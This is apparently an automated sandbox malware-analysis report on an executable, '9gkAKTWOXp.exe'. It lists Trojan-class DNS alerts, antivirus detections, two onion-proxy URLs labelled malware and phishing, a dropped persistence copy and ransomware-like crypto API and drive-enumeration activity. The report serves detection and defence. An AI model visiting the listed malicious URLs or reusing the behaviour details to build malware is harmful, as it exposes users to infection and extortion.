                    Timestamp:192.168.2.38.8.8.853470532829500 09/01/22-00:02:00.646017
                    SID:2829500
                    Source Port:53470
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865324532026737 09/01/22-00:01:43.883100
                    SID:2026737
                    Source Port:65324
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853851532026737 09/01/22-00:01:50.267332
                    SID:2026737
                    Source Port:53851
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.862433532026737 09/01/22-00:02:57.467935
                    SID:2026737
                    Source Port:62433
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859584532026737 09/01/22-00:02:11.726579
                    SID:2026737
                    Source Port:59584
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860475532829498 09/01/22-00:02:47.139274
                    SID:2829498
                    Source Port:60475
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864123532829498 09/01/22-00:02:44.306860
                    SID:2829498
                    Source Port:64123
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858483532829500 09/01/22-00:03:29.383909
                    SID:2829500
                    Source Port:58483
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.856618532026737 09/01/22-00:02:49.105935
                    SID:2026737
                    Source Port:56618
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855247532829498 09/01/22-00:03:03.466197
                    SID:2829498
                    Source Port:55247
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861362532829498 09/01/22-00:03:28.520063
                    SID:2829498
                    Source Port:61362
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861129532829498 09/01/22-00:03:15.922110
                    SID:2829498
                    Source Port:61129
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857574532829498 09/01/22-00:01:53.251460
                    SID:2829498
                    Source Port:57574
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864597532829498 09/01/22-00:02:22.051454
                    SID:2829498
                    Source Port:64597
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858303532026737 09/01/22-00:02:34.435886
                    SID:2026737
                    Source Port:58303
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865387532026737 09/01/22-00:02:38.660218
                    SID:2026737
                    Source Port:65387
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853274532829498 09/01/22-00:02:55.325848
                    SID:2829498
                    Source Port:53274
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851594532026737 09/01/22-00:03:26.907030
                    SID:2026737
                    Source Port:51594
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863565532026737 09/01/22-00:02:17.049623
                    SID:2026737
                    Source Port:63565
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850627532026737 09/01/22-00:03:18.737468
                    SID:2026737
                    Source Port:50627
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858124532829498 09/01/22-00:02:27.993076
                    SID:2829498
                    Source Port:58124
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850786532026737 09/01/22-00:02:43.346779
                    SID:2026737
                    Source Port:50786
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850233532026737 09/01/22-00:02:54.805593
                    SID:2026737
                    Source Port:50233
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854287532829500 09/01/22-00:03:33.736226
                    SID:2829500
                    Source Port:54287
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864605532829500 09/01/22-00:02:41.882665
                    SID:2829500
                    Source Port:64605
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864604532829500 09/01/22-00:02:41.862105
                    SID:2829500
                    Source Port:64604
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855246532829498 09/01/22-00:03:03.448041
                    SID:2829498
                    Source Port:55246
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855953532829500 09/01/22-00:03:25.594151
                    SID:2829500
                    Source Port:55953
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858484532829500 09/01/22-00:03:29.402067
                    SID:2829500
                    Source Port:58484
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857139532829498 09/01/22-00:01:34.235761
                    SID:2829498
                    Source Port:57139
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859435532026737 09/01/22-00:01:57.617695
                    SID:2026737
                    Source Port:59435
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863564532026737 09/01/22-00:02:17.026690
                    SID:2026737
                    Source Port:63564
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852958532829500 09/01/22-00:01:25.347118
                    SID:2829500
                    Source Port:52958
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860092532829500 09/01/22-00:02:16.532570
                    SID:2829500
                    Source Port:60092
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863690532829498 09/01/22-00:03:21.664385
                    SID:2829498
                    Source Port:63690
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858304532026737 09/01/22-00:02:34.463044
                    SID:2026737
                    Source Port:58304
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855459532829498 09/01/22-00:03:07.276022
                    SID:2829498
                    Source Port:55459
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860476532829498 09/01/22-00:02:47.160135
                    SID:2829498
                    Source Port:60476
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865110532829500 09/01/22-00:01:46.934130
                    SID:2829500
                    Source Port:65110
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863449532829498 09/01/22-00:02:35.476503
                    SID:2829498
                    Source Port:63449
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852960532829500 09/01/22-00:01:25.385522
                    SID:2829500
                    Source Port:52960
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857390532829500 09/01/22-00:02:53.250639
                    SID:2829500
                    Source Port:57390
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857573532829498 09/01/22-00:01:53.226527
                    SID:2829498
                    Source Port:57573
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865514532829500 09/01/22-00:02:19.450712
                    SID:2829500
                    Source Port:65514
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861131532829498 09/01/22-00:03:15.960645
                    SID:2829498
                    Source Port:61131
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851141532829498 09/01/22-00:01:24.068248
                    SID:2829498
                    Source Port:51141
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853052532829498 09/01/22-00:02:15.036327
                    SID:2829498
                    Source Port:53052
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861128532829498 09/01/22-00:03:15.903464
                    SID:2829498
                    Source Port:61128
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852745532026737 09/01/22-00:03:24.040007
                    SID:2026737
                    Source Port:52745
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854156532829498 09/01/22-00:02:39.730598
                    SID:2829498
                    Source Port:54156
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857709532829500 09/01/22-00:01:42.750967
                    SID:2829500
                    Source Port:57709
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861363532829498 09/01/22-00:03:28.538480
                    SID:2829498
                    Source Port:61363
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853308532829500 09/01/22-00:01:54.898418
                    SID:2829500
                    Source Port:53308
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860585532026737 09/01/22-00:01:27.503002
                    SID:2026737
                    Source Port:60585
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860771532829498 09/01/22-00:01:45.495695
                    SID:2829498
                    Source Port:60771
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860422532829498 09/01/22-00:03:32.403375
                    SID:2829498
                    Source Port:60422
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850093532026737 09/01/22-00:03:38.699985
                    SID:2026737
                    Source Port:50093
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853041532026737 09/01/22-00:03:06.319112
                    SID:2026737
                    Source Port:53041
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851994532026737 09/01/22-00:02:26.273853
                    SID:2026737
                    Source Port:51994
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858917532829500 09/01/22-00:03:18.082512
                    SID:2829500
                    Source Port:58917
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864827532829500 09/01/22-00:02:24.792802
                    SID:2829500
                    Source Port:64827
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860820532829500 09/01/22-00:03:08.828384
                    SID:2829500
                    Source Port:60820
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851997532026737 09/01/22-00:02:26.333413
                    SID:2026737
                    Source Port:51997
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861188532829498 09/01/22-00:02:52.691629
                    SID:2829498
                    Source Port:61188
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859832532829500 09/01/22-00:02:56.017085
                    SID:2829500
                    Source Port:59832
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864600532829498 09/01/22-00:02:22.108885
                    SID:2829498
                    Source Port:64600
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855640532829498 09/01/22-00:01:41.280696
                    SID:2829498
                    Source Port:55640
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855462532829498 09/01/22-00:03:07.346617
                    SID:2829498
                    Source Port:55462
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859639532026737 09/01/22-00:01:39.951734
                    SID:2026737
                    Source Port:59639
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855653532829498 09/01/22-00:03:19.277165
                    SID:2829498
                    Source Port:55653
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857826532829500 09/01/22-00:03:22.956962
                    SID:2829500
                    Source Port:57826
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853847532829498 09/01/22-00:01:59.444336
                    SID:2829498
                    Source Port:53847
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851108532829500 09/01/22-00:03:01.644612
                    SID:2829500
                    Source Port:51108
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852459532026737 09/01/22-00:03:02.900983
                    SID:2026737
                    Source Port:52459
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864381532829500 09/01/22-00:03:20.034172
                    SID:2829500
                    Source Port:64381
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853626532026737 09/01/22-00:02:01.814516
                    SID:2026737
                    Source Port:53626
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859823532026737 09/01/22-00:02:19.973756
                    SID:2026737
                    Source Port:59823
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851892532026737 09/01/22-00:03:31.996527
                    SID:2026737
                    Source Port:51892
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.856621532026737 09/01/22-00:02:49.211680
                    SID:2026737
                    Source Port:56621
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855956532829500 09/01/22-00:03:25.650230
                    SID:2829500
                    Source Port:55956
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 9gkAKTWOXp.exeVirustotal: Detection: 81%Perma Link
                    Source: 9gkAKTWOXp.exeMetadefender: Detection: 72%Perma Link
                    Source: 9gkAKTWOXp.exeReversingLabs: Detection: 100%
                    Source: 9gkAKTWOXp.exeAvira: detected
                    Source: http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144deAvira URL Cloud: Label: malware
                    Source: http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144deAvira URL Cloud: Label: phishing
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen3
                    Source: 9gkAKTWOXp.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeJoe Sandbox ML: detected
                    Source: 13.0.vkspii.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
                    Source: 1.2.9gkAKTWOXp.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
                    Source: 13.2.vkspii.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
                    Source: 21.2.vkspii.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
                    Source: 1.0.9gkAKTWOXp.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
                    Source: 21.0.vkspii.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00405750 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,1_2_00405750
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00407C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,1_2_00407C60
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00405D80 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,1_2_00405D80
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_004048A0 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,1_2_004048A0
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00407DB0 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,1_2_00407DB0
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00405540 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,1_2_00405540
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00405050 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,MultiByteToWideChar,GetLastError,VirtualAlloc,VirtualFree,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,1_2_00405050
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,1_2_00406000
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_004048A0 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,13_2_004048A0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_00405540 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,13_2_00405540
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_00405750 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,13_2_00405750
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_00405050 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,MultiByteToWideChar,GetLastError,VirtualAlloc,VirtualFree,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,13_2_00405050
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_00407C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,13_2_00407C60
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,13_2_00406000
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_00405D80 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,13_2_00405D80
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_00407DB0 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,13_2_00407DB0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_004048A0 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,21_2_004048A0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_00405540 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,21_2_00405540
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_00405750 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,21_2_00405750
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_00405050 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,MultiByteToWideChar,GetLastError,VirtualAlloc,VirtualFree,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,21_2_00405050
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_00407C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,21_2_00407C60
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,21_2_00406000
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_00405D80 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,21_2_00405D80
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_00407DB0 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,21_2_00407DB0
                    Source: 9gkAKTWOXp.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 9gkAKTWOXp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: z:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: x:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: v:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: t:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: r:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: p:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: n:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: l:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: j:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: h:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: f:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: b:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: y:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: w:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: u:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: s:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: q:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: o:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: m:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: k:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: i:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: g:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: e:Jump to behavior
